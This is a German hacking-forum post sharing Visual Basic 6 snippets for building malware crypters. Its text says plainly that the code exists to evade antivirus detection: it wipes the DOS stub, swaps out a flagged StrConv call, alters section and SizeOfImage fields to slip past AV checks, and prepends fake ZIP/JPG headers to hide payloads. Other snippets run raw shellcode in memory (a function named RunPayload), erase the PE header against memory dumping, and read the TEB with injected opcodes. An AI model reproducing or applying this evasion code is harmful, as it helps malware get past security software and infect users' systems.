Ergebnis 1 bis 7 von 7

Baum-Darstellung

  1. #1
    Anfänger
    Registriert seit
    09.06.2015
    Beiträge
    16

    Daumen hoch [Source Code] VB6 Code snippets

    Hi Leute
    hier ist ein kleines snippet womit man den dos header/dos stub im PE Header entfernen kann was helfen kann ein paar detections zu entfernen

    Code:
    Option Explicit
    Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
    Private Const SIZE_DOS_HEADER As Long = &H40
    Private Const SIZE_NT_HEADERS As Long = &HF8
    Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
    End Type
    Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_EXPORT_DIRECTORY
    Characteristics As Long
    TimeDateStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    lpName As Long
    Base As Long
    NumberOfFunctions As Long
    NumberOfNames As Long
    lpAddressOfFunctions As Long
    lpAddressOfNames As Long
    lpAddressOfNameOrdinals As Long
    End Type
    Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    Characteristics As Long
    End Type
    Private Type IMAGE_IMPORT_DESCRIPTOR
    Characteristics As Long
    OriginalFirstThunk As Long
    TimDateStamp As Long
    ForwarderChain As Long
    Name1 As Long
    FirstThunk As Long
    End Type
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)
    Public Function WipeDosStub(sOldFile As String, sNewFile As String) As Boolean
    Dim lpDosStub As Long
    Dim lpEOH As Long
    Dim lpSOH As Long
    Dim bFile1() As Byte
    Dim bFile2() As Byte
    Dim bTemp() As Byte
    Dim IDH As IMAGE_DOS_HEADER
    Dim INH As IMAGE_NT_HEADERS
    Dim i As Long
    Dim lpTmp As Long
    Open sOldFile For Binary As #1
    ReDim bFile1(LOF(1) - 1)
    Get #1, , bFile1
    Close #1
    Call CopyMemory(IDH, bFile1(0), SIZE_DOS_HEADER)
    Call CopyMemory(INH, bFile1(IDH.e_lfanew), SIZE_NT_HEADERS)
    If Not IDH.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function
    If Not INH.Signature = IMAGE_NT_SIGNATURE Then Exit Function
    lpDosStub = IDH.e_lfanew - &H40
    ReDim Preserve bFile2(SIZE_DOS_HEADER) As Byte
    CopyMemory bFile2(0), bFile1(0), SIZE_DOS_HEADER
    lpEOH = IDH.e_lfanew + 248 + INH.FileHeader.NumberOfSections * 40
    lpSOH = lpEOH - IDH.e_lfanew
    lpTmp = Length(bFile2)
    ReDim Preserve bFile2(lpTmp + lpSOH) As Byte
    CopyMemory bFile2(lpTmp), bFile1(IDH.e_lfanew), lpSOH
    lpTmp = Length(bFile2)
    ReDim bTemp(lpDosStub) As Byte
    For i = 0 To lpDosStub - 1
    bTemp(i) = &H0
    Next i
    ReDim Preserve bFile2(lpTmp + lpDosStub) As Byte
    CopyMemory bFile2(lpTmp), bTemp(0), lpDosStub
    lpTmp = Length(bFile2)
    ReDim Preserve bFile2(Length(bFile1)) As Byte
    CopyMemory bFile2(lpTmp), bFile1(lpEOH), Length(bFile1) - lpEOH
    IDH.e_lfanew = SIZE_DOS_HEADER
    CopyMemory bFile2(0), IDH, 64
    
    Open sNewFile For Binary As #1
    Put #1, , bFile2
    Close #1
    WipeDosStub = True
    End Function
    Function Length(abArray() As Byte) As Long
    Length = UBound(abArray) - LBound(abArray)
    End Function
    ----------------------------------------------------------------------------------------------------------------
    euch ist bestimmt aufgefallen das die VB6 Funktion StrConv manchmal detected wird hier ist eine kleine alternative
    Code:
    Public Function AltStrConv(Temp As Variant, Conversion As VbStrConv) As Variant
     Dim I As Long, lLen As Long
     Dim bArr() As Byte, sString As String
    If Conversion = vbFromUnicode Then
    sString = Temp
    lLen = Len(sString) - 1
    ReDim bArr(lLen)
    For I = 0 To lLen
    bArr(I) = Asc(Mid(Temp, (I + 1), 1))
    Next I
    AltStrConv = bArr
    ElseIf Conversion = vbUnicode Then
    bArr = Temp
    lLen = UBound(Temp)
    sString = Space$(lLen + 1)
    For I = 0 To lLen
    sString = sString & Chr(bArr(I))
    Next I
    AltStrConv = sString
    End If
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktionen um die nutzlosen 00 zu Löschen wo normal die Eof Data gespeichert wird
    Code:
    Option Explicit
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&
    Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&
    Private Const SIZE_DOS_HEADER               As Long = &H40
    Private Const SIZE_NT_HEADERS               As Long = &HF8
    Private Const SIZE_SECTION_HEADER           As Long = &H28
    
    Public Type IMAGE_DOS_HEADER
    e_magic As Integer ' Magic number
    e_cblp As Integer ' Bytes on last page of file
    e_cp As Integer ' Pages in file
    e_crlc As Integer ' Relocations
    e_cparhdr As Integer ' Size of header in paragraphs
    e_minalloc As Integer ' Minimum extra paragraphs needed
    e_maxalloc As Integer ' Maximum extra paragraphs needed
    e_ss As Integer ' Initial (relative) SS value
    e_sp As Integer ' Initial SP value
    e_csum As Integer ' Checksum
    e_ip As Integer ' Initial IP value
    e_cs As Integer ' Initial (relative) CS value
    e_lfarlc As Integer ' File address of relocation table
    e_ovno As Integer ' Overlay number
    e_res(0 To 3) As Integer ' Reserved words
    e_oemid As Integer ' OEM identifier (for e_oeminfo)
    e_oeminfo As Integer ' OEM information; e_oemid specific
    e_res2(0 To 9) As Integer ' Reserved words
    e_lfanew As Long ' File address of new exe header
    End Type
    Public Type IMAGE_EXPORT_DIRECTORY
    Characteristics As Long
    TimeDateStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    Name As Long
    Base As Long
    NumberOfFunctions As Long
    NumberOfNames As Long
    AddressOfFunctions As Long
    AddressOfNames As Long
    AddressOfNameOrdinals As Long
    End Type
    Public Type IMAGE_IMPORT_DIRECTORY
    dwRVAFunctionNameList As Long
    TimeDateStamp As Long
    ForwarderChain As Long
    dwRVAModuleName As Long
    dwRVAFunctionAddressList As Long
    End Type
    Public Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
    End Type
    Public Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    Public Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type
    Public Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type
    Public Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    Characteristics As Long
    End Type
    'IMAGE DATA DIRECTORY:
    '1-Export Table
    '2-Import Table
    '3-Resource Table
    '4-Exception Table
    '5-Certificate Table
    '6-Relocation Table
    '7-Debug Data
    '8-Architecture Data
    '9-Machine Value (MIPS GP)
    '10-TLS Table
    '11-Load Configuration Table
    '12-Bound Import Table
    '13-Import Address Table
    '14-Delay Import Descriptor
    '15-COM+ Runtime Header
    '16-Reserved
    Dim IDH As IMAGE_DOS_HEADER
    Dim INH As IMAGE_NT_HEADERS
    Dim ISH As IMAGE_SECTION_HEADER
    Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (dest As Any, Src As Any, ByVal L As Long)
    Public Function Delete_NOPS(Data As String, Result As String)
    Dim bFile() As Byte
    Dim bResult() As Byte
    Dim i As Long
    Dim ZeroCount As Long
    Open Data For Binary As #1
    ReDim bFile(LOF(1))
    Get #1, , bFile
    Close #1
    Call CopyMemory(IDH, bFile(0), SIZE_DOS_HEADER)
    Call CopyMemory(INH, bFile(IDH.e_lfanew), SIZE_NT_HEADERS)
    Call CopyMemory(ISH, bFile(IDH.e_lfanew + SIZE_NT_HEADERS + (INH.FileHeader.NumberOfSections - 1) * &H28), &H28)
    ZeroCount = 0
    i = ISH.PointerToRawData + ISH.SizeOfRawData
    While i > ISH.PointerToRawData
        If bFile(i) = 0 Then
            ZeroCount = ZeroCount + 1
        End If
        i = i - 1
    Wend
    ReDim bResult(UBound(bFile) - ZeroCount)
    Call CopyMemory(bResult(0), bFile(0), UBound(bFile) - ZeroCount)
    ISH.SizeOfRawData = ISH.SizeOfRawData - ZeroCount
    Call CopyMemory(bResult(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), ISH, 40)
    Open Result For Binary As #1
    Put #1, , bResult
    Close #1
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Mit dieser Funktion könnt ihr die größe (SizeOfRawData , SizeOfVirutalData) der RSRC Section anpassen was oft einige Antiviruse umgeht weil diese erkennen wenn die größen nicht korrekt sind
    Code:
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&
    Private Type IMAGE_DOS_HEADER
        e_magic                     As Integer
        e_cblp                      As Integer
        e_cp                        As Integer
        e_crlc                      As Integer
        e_cparhdr                   As Integer
        e_minalloc                  As Integer
        e_maxalloc                  As Integer
        e_ss                        As Integer
        e_sp                        As Integer
        e_csum                      As Integer
        e_ip                        As Integer
        e_cs                        As Integer
        e_lfarlc                    As Integer
        e_ovno                      As Integer
        e_res(0 To 3)               As Integer
        e_oemid                     As Integer
        e_oeminfo                   As Integer
        e_res2(0 To 9)              As Integer
        e_lfanew                    As Long
    End Type
    Private Type IMAGE_FILE_HEADER
        Machine                     As Integer
        NumberOfSections            As Integer
        TimeDateStamp               As Long
        PointerToSymbolTable        As Long
        NumberOfSymbols             As Long
        SizeOfOptionalHeader        As Integer
        characteristics             As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress              As Long
        Size                        As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
        Magic                       As Integer
        MajorLinkerVersion          As Byte
        MinorLinkerVersion          As Byte
        SizeOfCode                  As Long
        SizeOfInitializedData       As Long
        SizeOfUnitializedData       As Long
        AddressOfEntryPoint         As Long
        BaseOfCode                  As Long
        BaseOfData                  As Long
        ImageBase                   As Long
        SectionAlignment            As Long
        FileAlignment               As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion           As Integer
        MinorImageVersion           As Integer
        MajorSubsystemVersion       As Integer
        MinorSubsystemVersion       As Integer
        W32VersionValue             As Long
        SizeOfImage                 As Long
        SizeOfHeaders               As Long
        CheckSum                    As Long
        SubSystem                   As Integer
        DllCharacteristics          As Integer
        SizeOfStackReserve          As Long
        SizeOfStackCommit           As Long
        SizeOfHeapReserve           As Long
        SizeOfHeapCommit            As Long
        LoaderFlags                 As Long
        NumberOfRvaAndSizes         As Long
        DataDirectory(0 To 15)      As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
        Signature                   As Long
        FileHeader                  As IMAGE_FILE_HEADER
        OptionalHeader              As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_SECTION_HEADER
        SecName                     As String * 8
        VirtualSize                 As Long
        VirtualAddress              As Long
        SizeOfRawData               As Long
        PointerToRawData            As Long
        PointerToRelocations        As Long
        PointerToLinenumbers        As Long
        NumberOfRelocations         As Integer
        NumberOfLinenumbers         As Integer
        characteristics             As Long
    End Type
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long)
    Function EnlargeSection(szFilePath As String, Length As String) As Boolean
    Dim bFile() As Byte, IDH As IMAGE_DOS_HEADER, INH As IMAGE_NT_HEADERS, ISH As IMAGE_SECTION_HEADER
    Open szFilePath For Binary Access Read As #1
    ReDim bFile(LOF(1))
    Get #1, , bFile
    Close #1
    Call CopyMemory(IDH, bFile(0), 64)
    If IDH.e_magic = IMAGE_DOS_SIGNATURE Then
        Call CopyMemory(INH, bFile(IDH.e_lfanew), 248)
        If INH.Signature = IMAGE_NT_SIGNATURE Then
            Call CopyMemory(ISH, bFile(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), 40)
            ISH.SizeOfRawData = ISH.SizeOfRawData + Length
            ISH.VirtualSize = ISH.VirtualSize + Length
            INH.OptionalHeader.SizeOfImage = ISH.VirtualAddress + ISH.VirtualSize
            Call CopyMemory(bFile(IDH.e_lfanew), INH, 248)
            Call CopyMemory(bFile(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), ISH, 40)
            Open szFilePath For Binary Access Write As #1
            Put #1, , bFile()
            Close
        End If
    End If
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Diese Funktion gibt den aktuellen Exenamen/Pfad zurück von euere Datei.
    Code:
    Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, Optional ByVal hwnd As Long, Optional ByVal Msg As Long, Optional ByVal wParam As Long, Optional ByVal lParam As Long) As Long
    Public Function GetFileName() As String
        Dim mOpCode        As String
        Dim bvName(519)    As Byte
        
        GetFileName = bvName
        
        mOpCode = "64A1300000008B40108B703C0FB748388" & _
                  "B7C240451FCF3A4598B742404894EFCC3"
        
        ReDim mAsmByte(0 To Len(mOpCode) / 2 - 1) As Byte
        For i = 0 To Len(mOpCode) - 1 Step 2
        mAsmByte((i / 2)) = CByte("&h" & Mid$(mOpCode, i + 1, 2))
        Next
        
       CallWindowProc VarPtr(mAsmByte(0)), StrPtr(GetFileName)
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Hier ist eine kleine Funktion welche ich geschrieben habe die vollkommen Unicode Kombatibel ist. Sie ersetzt z.b.
    Code:
    Dim Size As String
    Open App.Path & "\DeineDatei.exe" For Binary As #1
    Size = Space(LOF(1))
    Get #1, , Size
    Close #1
    Funktion:
    Code:
    Option Explicit
    Private Type OVERLAPPED
        ternal As Long
        ternalHigh As Long
        offset As Long
        OffsetHigh As Long
        hEvent As Long
    End Type
    Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileW" ( _
    ByVal lpFileName As Long, _
    ByVal dwDesiredAccess&, _
    ByVal dwShareMode&, _
    ByVal lpSecurityAttributes&, _
    ByVal dwCreationDisposition&, _
    ByVal dwFlagsAndAttributes&, _
    ByVal hTemplateFile&) As Long
    Private Declare Function ReadFile Lib "kernel32.dll" ( _
    ByVal hFile As Long, _
    ByRef lpBuffer As Any, _
    ByVal nNumberOfBytesToRead As Long, _
    ByRef lpNumberOfBytesRead As Long, _
    ByRef lpOverlapped As OVERLAPPED) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject&) As Long
    Private Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
    Private Declare Function GetFileSizeEx Lib "kernel32.dll" (ByVal hFile As Long, ByRef lpFileSize As Currency) As Long
    Private Const GENERIC_READ As Long = &H80000000
    Private Const GENERIC_WRITE As Long = &H40000000
    Private Const FILE_SHARE_READ As Long = &H1&
    Private Const FILE_SHARE_WRITE As Long = &H2&
    Private Const CREATE_NEW            As Long = 1&
    Private Const CREATE_ALWAYS         As Long = 2&
    Private Const OPEN_EXISTING         As Long = 3&
    Private Const OPEN_ALWAYS           As Long = 4&
    Private Const TRUNCATE_EXISTING     As Long = 5&
    Private Const FILE_BEGIN            As Long = 0
    Private Function getFileString(FileName As String) As String
    Dim FileSize        As Currency
    Dim hFile           As Long
    Dim lOverLapped     As OVERLAPPED
    Dim TxtBytes()      As Byte
    Dim Ret             As Long
    Dim I               As Integer
    Dim Start           As Long
        hFile = CreateFile(StrPtr(FileName), GENERIC_READ, FILE_SHARE_READ, 0&, OPEN_EXISTING, 0&, 0&)
        If hFile <> -1 Then
            
            If GetFileSizeEx(hFile, FileSize) Then
                
                
                
                ReDim TxtBytes(0 To FileSize) As Byte
                
                Start = 0
                Call SetFilePointer(hFile, Start, 0, FILE_BEGIN)
                
                
                If ReadFile(hFile, TxtBytes(0), FileSize, 0, lOverLapped) Then
                    getFileString = StrConv(TxtBytes, vbUnicode)
                End If
            End If
            
        End If
        
        CloseHandle hFile
    End Function
    So nutzt ihr sie:
    Code:
    Dim Size as String
    Size = getFileString("c:\a.txt")
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktion welche keine CallWindowProcW Api nutzt. Ihr könnt daraus ganz einfach ein CallApiByName basteln werde die Tage auch ein paar releasen.
    Code:
    Private Declare Function SetMemNewObj Lib "msvbvm60" (ByVal ptr1 As Long, ByVal ptr2 As Long, ByVal ptr3 As Long, ByRef ptr2 As Long) As Long
    Private Type DUMB_LONG
        lLNG        As Long
    End Type
     
    Private Type BYTES_LONG
        b1          As Byte:    b2          As Byte
        b3          As Byte:    b4          As Byte
    End Type
    Private Function RunPayload(ByRef ASM() As Byte) As Long
        Dim AsmHandler(&HC) As Byte
        'MOV EAX, PTR
        'CALL EAX
        'ADD ESP,C
        'RETN
        AsmHandler(0) = &HB8:   AddLong AsmHandler, VarPtr(ASM(0)), 1
        AsmHandler(5) = &HFF:   AsmHandler(6) = &HD0
        AsmHandler(7) = &H83:   AsmHandler(8) = &HC4
        AsmHandler(9) = &HC:    AsmHandler(10) = &HC2
        AsmHandler(11) = &H8:   AsmHandler(12) = &H0
        RunPayload = SetMemNewObj(0, 0, 0, VarPtr(VarPtr(AsmHandler(0))) - &H4))
        
    End Function
    Private Sub AddLong(ByRef ASM() As Byte, ByVal lLong As Long, ByVal Index As Long)
        'Swap Endian (Ej: 0xDEADBEEF <-> 0xEFBEADDE)
        Dim tDL         As DUMB_LONG
        Dim tBL         As BYTES_LONG
        
        tDL.lLNG = lLong
        LSet tBL = tDL
        
        ASM(Index) = tBL.b1
        ASM(Index + 1) = tBL.b2
        ASM(Index + 2) = tBL.b3
        ASM(Index + 3) = tBL.b4
        
    End Sub
    ----------------------------------------------------------------------------------------------------------------
    Mit der Funktion könnt ihr einen Fake Header adden eignet sich z.b. gut in Kombination mit der Resource Storage Methode.
    Code:
    Option Explicit
     
    Public Enum Header_Type
        ZIP = 1: RAR = 2: BMP = 3: JPG = 4: GIF = 5: ICO = 6: MSU = 7
    End Enum
     
    Public Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
     
    Public Function AddHeader(strBuffer As String, dwHeaderType As Header_Type) As String ' Add first 10 bytes from specified file type
        Dim bHeader(9) As Byte
        Dim bArray() As Byte
        Dim bRes() As Byte
        Dim lPos As Long
        Dim i As Integer
     
        bArray() = StrConv(strBuffer & vbNullString, vbFromUnicode)
     
        Select Case dwHeaderType
        Case 1 ' ZIP
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H50, &H4B, &H3, &H4, &H14, &H0, &H0, &H0, &H8, &H9))
            Next i
        Case 2 ' RAR
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H52, &H61, &H72, &H21, &H1A, &H7, &H0, &HCF, &H90, &H73))
            Next i
        Case 3 ' BMP
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H42, &H4D, &HD8, &HBB, &HD, &H0, &H0, &H0, &H0, &H0))
            Next i
        Case 4 ' JPG
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &HFF, &HD8, &HFF, &HE0, &H0, &H10, &H4A, &H46, &H49, &H46))
            Next i
        Case 5 ' GIF
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H47, &H49, &H46, &H38, &H39, &H61, &H64, &H0, &H64, &H0))
            Next i
        Case 6 ' ICO
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H0, &H0, &H1, &H0, &H8, &H0, &H30, &H30, &H0, &H0))
            Next i
        Case 7 ' MSU
            For i = 0 To 9
                bHeader(i) = CByte(Choose(i + 1, &H4D, &H53, &H43, &H46, &H0, &H0, &H0, &H0, &HE1, &H9))
            Next i
        End Select
     
        bRes() = bHeader()
        lPos = UBound(bRes)
        ReDim Preserve bRes(UBound(bRes) + UBound(bArray) + 1)
        NtWriteVirtualMemory -1, bRes(lPos + 1), bArray(0), UBound(bArray) + 1, ByVal 0&
     
        AddHeader = StrConv(bRes(), vbUnicode)
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktion womit ihr die SizeOfImage im PE Header anpassen könnt was manche Avs detecten wenn sie nicht stimmt
    Code:
    Option Explicit
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&
    Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&
    Private Const SIZE_DOS_HEADER               As Long = &H40
    Private Const SIZE_NT_HEADERS               As Long = &HF8
    Private Const SIZE_SECTION_HEADER           As Long = &H28
    Private Type IMAGE_DOS_HEADER
        e_magic                     As Integer
        e_cblp                      As Integer
        e_cp                        As Integer
        e_crlc                      As Integer
        e_cparhdr                   As Integer
        e_minalloc                  As Integer
        e_maxalloc                  As Integer
        e_ss                        As Integer
        e_sp                        As Integer
        e_csum                      As Integer
        e_ip                        As Integer
        e_cs                        As Integer
        e_lfarlc                    As Integer
        e_ovno                      As Integer
        e_res(0 To 3)               As Integer
        e_oemid                     As Integer
        e_oeminfo                   As Integer
        e_res2(0 To 9)              As Integer
        e_lfanew                    As Long
    End Type
    Private Type IMAGE_FILE_HEADER
        Machine                     As Integer
        NumberOfSections            As Integer
        TimeDateStamp               As Long
        PointerToSymbolTable        As Long
        NumberOfSymbols             As Long
        SizeOfOptionalHeader        As Integer
        Characteristics             As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress              As Long
        Size                        As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
        Magic                       As Integer
        MajorLinkerVersion          As Byte
        MinorLinkerVersion          As Byte
        SizeOfCode                  As Long
        SizeOfInitializedData       As Long
        SizeOfUnitializedData       As Long
        AddressOfEntryPoint         As Long
        BaseOfCode                  As Long
        BaseOfData                  As Long
        ImageBase                   As Long
        SectionAlignment            As Long
        FileAlignment               As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion           As Integer
        MinorImageVersion           As Integer
        MajorSubsystemVersion       As Integer
        MinorSubsystemVersion       As Integer
        W32VersionValue             As Long
        SizeOfImage                 As Long
        SizeOfHeaders               As Long
        Checksum                    As Long
        Subsystem                   As Integer
        DllCharacteristics          As Integer
        SizeOfStackReserve          As Long
        SizeOfStackCommit           As Long
        SizeOfHeapReserve           As Long
        SizeOfHeapCommit            As Long
        LoaderFlags                 As Long
        NumberOfRvaAndSizes         As Long
        DataDirectory(0 To 15)      As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
        Signature                   As Long
        FileHeader                  As IMAGE_FILE_HEADER
        OptionalHeader              As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_SECTION_HEADER
        SecName                     As String * 8
        VirtualSize                 As Long
        VirtualAddress              As Long
        SizeOfRawData               As Long
        PointerToRawData            As Long
        PointerToRelocations        As Long
        PointerToLinenumbers        As Long
        NumberOfRelocations         As Integer
        NumberOfLinenumbers         As Integer
        Characteristics             As Long
    End Type
    Public Function FixSizeOfImage(sStrPath As String)
    Dim Size_of_File As String
    Dim tIMAGE_DOS_HEADER       As IMAGE_DOS_HEADER
    Dim tIMAGE_NT_HEADERS       As IMAGE_NT_HEADERS
    Open sStrPath For Binary As #1
    Size_of_File = Space$(LOF(1))
    Get #1, , Size_of_File
    Close #1
    Open sStrPath For Binary As #1
    Get #1, , tIMAGE_DOS_HEADER
    Get #1, 1 + tIMAGE_DOS_HEADER.e_lfanew, tIMAGE_NT_HEADERS
    tIMAGE_NT_HEADERS.OptionalHeader.SizeOfImage = Len(Size_of_File)
    Put #1, 1 + tIMAGE_DOS_HEADER.e_lfanew, tIMAGE_NT_HEADERS
    Close #1
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Mit dieser Funktion könnt ihr eure Dateien vor Debuggern schützen
    Code:
    Option Explicit
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long
    Private Declare Sub RtlMoveMemory Lib "kernel32" (Destination As Any, source As Any, ByVal Length As Long)
    Private Declare Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As Long, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
    Public Sub sAntiDump()
    Dim hModule As Long
    Dim bDosheader(63) As Byte
    Dim lngOldProtect   As Long
    hModule = GetModuleHandleA(vbNullString)
    VirtualProtect ByVal hModule, 64, &H40, lngOldProtect
    RtlMoveMemory ByVal hModule, bDosheader(0), 64
    VirtualProtect ByVal hModule, 64, lngOldProtect, lngOldProtect
    End Sub
    ----------------------------------------------------------------------------------------------------------------
    Mit diesem Code könnt ihr die TEB adresse herausfinden aufgerufen wird es so:
    Code:
    Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByVal Destination As Any, ByVal Source As Any, ByVal Length As Long)
    Public Function GetTEB() As Long
        Dim b(6) As Byte
        Dim c(6) As Byte
        Dim d As Long
        
        b(0) = &H64 'MOV
        b(1) = &HA1 'EAX
        b(2) = &H18 '[FS:0x18]
        b(3) = &H0
        b(4) = &H0
        b(5) = &H0
        b(6) = &HC3 'RET
        
        d = DoNotCall(AddressOf DoNotCall)
        
        CopyMemory ByVal VarPtr(c(0)), ByVal d, 7
        CopyMemory ByVal d, ByVal VarPtr(b(0)), 7
        GetTEB = DoNotCall
        CopyMemory ByVal d, ByVal VarPtr(c(0)), 7
    End Function
    Public Function DoNotCall(Optional a As Long) As Long
        DoNotCall = a
    End Function
    Ich habe hier mal ein wenig aufgeräumt. mfg Barny
    Geändert von Barny (10.06.2015 um 20:48 Uhr)

Ähnliche Themen

  1. VB.NET Phising Source Code.
    Von Stelmi007 im Forum .NET Sprachen - Techniken
    Antworten: 2
    Letzter Beitrag: 11.02.2010, 22:09
  2. [s] fud source code crypter
    Von SUNZ im Forum Trashbox
    Antworten: 0
    Letzter Beitrag: 14.09.2009, 20:10

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •